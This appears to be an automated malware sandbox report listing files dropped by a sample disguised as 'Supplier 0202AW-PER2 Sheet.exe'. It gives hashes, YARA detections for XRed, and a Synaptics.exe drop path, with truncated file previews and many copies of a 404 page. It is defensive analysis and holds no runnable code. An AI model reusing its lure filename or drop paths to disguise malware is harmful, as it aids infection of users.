                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.3.0.0.4.4.9.0.0.8.1.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.3.0.0.5.2.3.6.9.5.6.5.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.9.1.e.9.f.1.-.9.8.5.7.-.4.4.c.5.-.a.3.3.2.-.e.6.4.4.b.b.8.b.b.9.0.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.3.3.4.1.8.b.e.-.8.3.1.6.-.4.0.f.d.-.b.7.d.b.-.a.c.e.0.5.6.0.8.3.e.4.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.f.4.-.0.0.0.1.-.0.0.1.4.-.e.8.c.0.-.d.4.4.f.a.1.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.b.0.e.8.6.4.1.6.5.6.b.e.7.3.9.a.f.7.0.1.e.0.b.c.1.9.7.d.d.3.9.4.2.1.7.2.e.a.9.2.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 11:00:46 2024, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3343604
                                                                                                                Entropy (8bit):2.037259826570782
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:De7eN/Dcouud+5v6901js0bvuHhUHdU7F5dJ8uoqZsT7Sjzr9uisI1Xjf+cU0UDZ:Detudho28
                                                                                                                MD5:BB5A86F9FE41D1EEB3B520754ACAB7D6
                                                                                                                SHA1:7EE715CC73D6885EA13C577819BFA44BB7341054
                                                                                                                SHA-256:E269645E257E2EFB351464CA753D857379F836EDEFAB1EC017EA6BA2A42D4C2E
                                                                                                                SHA-512:B2461DAF60CFEE9F62A4E17386D0B7EDDD2AAED74E939CC8C43104E48694B8CD3784A9D88BDCF0781BCBED645C45DD287AD2FF7303488B48D1D7CD03D120032A
                                                                                                                Malicious:false
                                                                                                                Preview:MDMP..a..... .......^}rg............$1..............88......$....W...........B..........`.......8...........T............1....1..........X...........Y..............................................................................eJ.......Z......GenuineIntel............T............nrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6306
                                                                                                                Entropy (8bit):3.713569127608964
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:R6l7wVeJ/xw6vCANGYiSWSpDu89bq7YMsf0OOm:R6lXJO6WYuIq7Yffb
                                                                                                                MD5:7118F8ABC0FF770CFF1198AC511B3830
                                                                                                                SHA1:74E873EC0DA550EBE352B2DA223C92901B47B9B7
                                                                                                                SHA-256:92B895A42AB1D10FCC84C218F89395A572B0AF5D851702E091107B3F106F5C59
                                                                                                                SHA-512:98333EA18D6BF6EC230777EB5525BC8FC3FE0A397E9CBD7E6AC0258DC268DDFC468BDBE1E0B1F6831A561F32607E25A5D3F4EDD36A7B6D5CEB1835DD6EFAF7FB
                                                                                                                Malicious:false
                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.1.2.<./.P.i.
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4572
                                                                                                                Entropy (8bit):4.445033363351891
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwWl8zslJg77aI9zIWpW8VYkYm8M4JFetF0vt+q84isBZ1Z3d:uIjf/I7Bh7VwJN7BnZ3d
                                                                                                                MD5:D700C41EC652DEEECC3EE99CAF10D707
                                                                                                                SHA1:B97C7C0B079FEE522595CD61C7F1377454E629D7
                                                                                                                SHA-256:9855C19578E47FE7EE3520A3BDF3034FF17711BAA07987CA574668FD883B8EF7
                                                                                                                SHA-512:05E8086EDF15C76DB041C9BCF7A5197F15D830E0E37D6FBEA3CFBABD4F20B9827CF3152FCF13872D09AD7CED172589BE6109F720BBAE20CA5CE78466976CD873
                                                                                                                Malicious:false
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653883" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                Process:C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):771584
                                                                                                                Entropy (8bit):6.629891194746731
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IGr:ansJ39LyjbJkQFMhmC+6GD9Z
                                                                                                                MD5:1D45B99034D67448EBF0776BD5699C84
                                                                                                                SHA1:B0E8641656BE739AF701E0BC197DD3942172EA92
                                                                                                                SHA-256:7D8C783C45AFF23E64E6E801C0F988002078A0E8DA5F85285BB335F997E7E50D
                                                                                                                SHA-512:7E42677B23D34E7EFC0F5DDC6B8E7EB29F3998FF376FF6CC5B5E6D0E4B060F2A8B141C6A510067C901D371BD07EAB9C76E9216A7EE6EED47C1CB592E9E203F10
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXC902.tmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXC902.tmp, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: Purchase Order No. G02873362-Docx.vbs, Detection: malicious, Browse
                                                                                                                • Filename: RNEQTT.exe, Detection: malicious, Browse
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1685504
                                                                                                                Entropy (8bit):7.450501854996061
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:MnsJ39LyjbJkQFMhmC+6GD9nhloDX0XOf4Z79H8qN3k87zwVb2UDEusw:MnsHyjtk2MYC5GD5hloJf68qIyUDEuL
                                                                                                                MD5:97E5BA8188B0E2613FD02EE2B8DFEE7A
                                                                                                                SHA1:17E314B66392D3D14E68F3E4A0CE4E3649255835
                                                                                                                SHA-256:2D976B78EFE5C7E983FF4CEF98DEB25D21A901E8F954F6D915D5642E75420296
                                                                                                                SHA-512:DBB0C03170D807BE5E43DEB0FD7F1198BB56606CD4BB65D3CCB00B19759336F84C49072BAEDC6E674DB308F58618F58E7D6DE24FCB12C7F951DE04E7E9C76E1F
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                Malicious:true
                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.265856083766831
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0QNbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+V+pAZewRDK4mW
                                                                                                                MD5:CEB2E715237F69A0D8C1ED0B1313EC0D
                                                                                                                SHA1:608CB648E4B7B9F0D5FAE7993BC129AE42444CBC
                                                                                                                SHA-256:57B292321A67EE9252FFF54B74CDF5DA3488B24B72E4047D907B26B66BB6929C
                                                                                                                SHA-512:E3619D6FC38BAEFA518482E939C26B4D7A7348075C45D2A995B4241B80359376B19327E1B5BA804CE8D49ED78192209DACA484B33AC3884C6DEDE7B02FE5A9C9
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AdBUf5KfuW4Sg3Vt0xCHHg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.261527325926892
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                                                MD5:B7C7E8F2AF632DC3EBC09CC903FA75BF
                                                                                                                SHA1:B1543D0CCF7C98C4B130B37ED5E542958F49AC3A
                                                                                                                SHA-256:F95A1694580B534A9B1B8F041CE1D8C0BA2FB502FB4EA9BD240F8DD793FAE1F0
                                                                                                                SHA-512:BD7472B96D2F51C01305EA5B88B7E04613786687C26969ECA459A8B7AD9C2EDD4FF843AD89415DB99B13DC34398D0C22B71E37ADDFE26E2449CB638A37A00B77
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="P0RbrVQE8L2tSm9luqxnXQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.2706230677489145
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0lCSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+mC+pAZewRDK4mW
                                                                                                                MD5:EB2B943E5E643A556CAD6C6FDAF3C028
                                                                                                                SHA1:D1797A4452CB30BF742CF53A641106689EAFE291
                                                                                                                SHA-256:7AEE0088B0E893131CEB562E8F55F9122D95E006475B64FF6F40EE8C739D7B06
                                                                                                                SHA-512:59BD23FF5DAE785454B546EB61A914CFB7DB6DA6B914636DCD5A7E6FAE523C3CFA91A53C03E2F84CCA6CD7D5AA4C1060D5398B460AB57CAD496E38BAF13AC71C
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5mJ2ozH46ODIHUvI4r2bQA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.2656604573273915
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0cd01WSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+zdr+pAZewRDK4mW
                                                                                                                MD5:D026ECCC935A6BC68C4494C68D365EC9
                                                                                                                SHA1:D8AC7ADDF87403E725D0DA3291622D71B22B4E9D
                                                                                                                SHA-256:11726E1DBDD2DA4544AF31DC1B8FFFB88BE9312F961A84BA4BC4CF90BF3D09DC
                                                                                                                SHA-512:5FFB77D99B57180A71FF9079D01816A0CE292273D69EB7E3403CBA086959D69632FA284B08696338B0D1F01B99D30A4C607659356509C6042EEF0D9C2D25BD99
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vQVqo8hTPFjJCmximoM_fQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.266071398588645
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                                                MD5:78EB787A78AECB8080B1E1B24CF6B359
                                                                                                                SHA1:08504960C6AB4F2D4AA271EA67445143774592A6
                                                                                                                SHA-256:80C2169AE63418984135215C118E1E755F174373AA5510674EE1D695A57AABBF
                                                                                                                SHA-512:AFC4A1E15FD8E4DE0BC697D9547C2C787363D6ADA07741C94B55060B2CD347C73BFCD9608AB464E16CD9912BA8A899519B8688AEFA56524263F3F2C36A84E443
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IVwE5Zkzu3DwBxDj8f3lfw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.272950351317562
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0OoSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+lo+pAZewRDK4mW
                                                                                                                MD5:52CE1F756107FC17AB8A6431C63F3C62
                                                                                                                SHA1:5723924A938E7C91D915F8BD991BAB37B466881B
                                                                                                                SHA-256:00D3A77EECBB0D0ECA6E5CBB1B0B21DB91C4E60136E9AE0624914958E06923CC
                                                                                                                SHA-512:3A88012038E3E74C977197C317125A7B6D2C3E575B99AC7CDE230618B0F0878E8FDC9EBFC548C2C183572B2815008C8D6653D8616B2EB53A89103CBF2CD2CFA8
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="j12NTkCFLCCGyIYOw4IcdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.267438431078175
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0KvSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                MD5:DF6B5E576CEE24A9C2CC49CA55FE4FE6
                                                                                                                SHA1:990C5016A29409C2658778E2AF5AC1A4ACAE2ED6
                                                                                                                SHA-256:66291597965773FA8E492261D7CFE393121C1AF57970C896FD87E6F4AB631C8A
                                                                                                                SHA-512:C835D7D0AD4226CA13DAEB6206E3C1A3B28408C560F8525B62C1987A54047DBA72076856D800ED93F8F60202E049A7C18EC61009567E5C9E8D6F22F07CD9C924
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wyguF2PNcsXUqMuG7CrAHA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.266759395435363
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0ySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+x+pAZewRDK4mW
                                                                                                                MD5:401CBEFB7EA588F9B762D84A8578DD2D
                                                                                                                SHA1:47C713A5780D09EB54B72B92AF814F66F1729793
                                                                                                                SHA-256:3455671A7017C20C9A70A1E30502F8CDA9D429E1B04280C2F48178297F3CC6C2
                                                                                                                SHA-512:DC81BC62C5F899680DBCEEE2D2D4FCA4418073A0A091B97C10C6CE6543649EB5494E3303CEC30DBBAA74A38704E138AB5586A4F331BFE3FBA57E01E40046DD14
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="esTmHigAMYE2DQtK3JTBfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.256223929478654
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0ws4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5j+pAZewRDK4mW
                                                                                                                MD5:EDD138D81DF757543DF638C90F36CF41
                                                                                                                SHA1:E90FD75C26A83A34FF0BA1AB5E3173231221ACE4
                                                                                                                SHA-256:68514F4860448DC311CB36E52EACF79A7BCC325A52CADE4768679B3526F03BDE
                                                                                                                SHA-512:30C546E7D289F22A324740D2734D59E825E75EBD6563D0BB6BDD2937015D4438948AD95FE3232BBCADF9E0A2642A7A4235DE6E34801010E90C0CF947F9BF2559
                                                                                                                Malicious:false
